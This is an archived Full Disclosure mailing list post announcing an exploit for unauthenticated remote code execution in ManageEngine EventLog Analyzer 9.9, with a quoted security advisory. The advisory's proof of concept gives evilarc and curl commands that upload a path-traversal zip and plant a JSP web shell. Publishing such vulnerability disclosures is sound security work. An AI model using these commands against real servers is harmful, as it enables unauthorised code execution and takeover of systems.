Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[The ManageOwnage Series, part IV]: RCE / file upload in Eventlog Analyzer, feat. special guests h0ng10 and Mogwai Security

From: Pedro Ribeiro <pedrib () gmail com>
Date: Mon, 1 Sep 2014 08:20:30 +0100
Hi all,

h0ng10 from Mogway Security has found a file upload leading to RCE in
Eventlog Analyzer (see advisory below for a snippet or go to
http://seclists.org/fulldisclosure/2014/Aug/86).

h0ng10 communicated this over a year ago to ManageEngine but they
failed to fix it. When I found and communicated the same vulnerability
to ManageEngine a week ago, they accepted my report as valid and said
they would look into it. There was no mention of h0ng10's previous
discovery, so I don't know what they did with it - perhaps they "lost"
or "misplaced" it?

Anyway, I had an exploit ready for when they fixed it, but since it's
the vulnerability information is out, I'm releasing the exploit today.
The exploit credit's h0ng10 as the original vulnerability discoverer
and can be found at:
https://github.com/rapid7/metasploit-framework/pull/3732
This will hopefully be integrated in Metasploit soon. The exploit has
been thoroughly tested in many Windows and Linux versions.

Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series!

Regards,
Pedro

On 31 August 2014 16:39, Advisories <advisories () mogwaisecurity de> wrote:

Mogwai Security Advisory MSA-2014-01
----------------------------------------------------------------------
Title:              ManageEngine EventLog Analyzer Multiple Vulnerabilities
Product:            ManageEngine EventLog Analyzer
Affected versions:  EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
Impact:             critical
Remote:             yes
Product link:       http://www.manageengine.com/products/eventlog/
Reported:           18/04/2013
by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)




Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated remote code execution
ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents
to send log data as zip files to the central server. Files can be uploaded
without
authentication and are stored/decompressed in the "data" subdirectory.

As the decompress procedure is handling the file names in the ZIP file in a
insecure way it is possible to store files in the web root of server. This can
be used to upload/execute code with the rights of the application server.


Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated remote code execution


- Create a malicious zip archive with the help of evilarc[1]
evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
- Send the malicious archive to the agentUpload servlet
curl -F "payload=@evil.zip" http://172.16.37.131:8400/agentUpload
- Enjoy your shell
http://172.16.37.131:8400/cmdshell.jsp

A working Metasploit module will be released next week.




----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

info () mogwaisecurity de



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: